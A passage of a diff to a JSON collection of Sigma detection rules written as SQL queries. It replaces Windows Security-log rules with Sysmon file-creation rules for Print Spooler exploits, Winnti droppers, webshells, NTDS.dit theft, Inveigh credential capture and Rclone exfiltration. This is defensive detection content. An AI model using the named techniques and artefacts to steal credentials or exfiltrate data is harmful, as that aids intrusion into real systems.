'%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1070.001" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "External Disk Drive Or USB Storage Device", - "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Detects 
external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", - "author": "Keith Wright", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_external_device.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "status": "test", + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Software installation ISO files" + "Cases in which a user mounts an image file for legitimate reasons" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND 
(EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", 
+ "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - 
"author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "User Added to Local Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - 
"description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - 
"status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Web Browsers" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": 
"win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects certificate 
creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, 
oscd.community", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "User with Privileges Logon", - "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "status": "test", + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "falsepositives": [ + "System administrators managing certififcates." 
+ ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + ], + "filename": "file_event_win_susp_pfx_file_creation.yml" + }, + { + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "description": "Detects the creation of an file in user Word Startup", "author": "frack113", + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], "falsepositives": [ - "Unknown" + "Addition of legitimate plugins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_admin_logon.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian 
Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly 
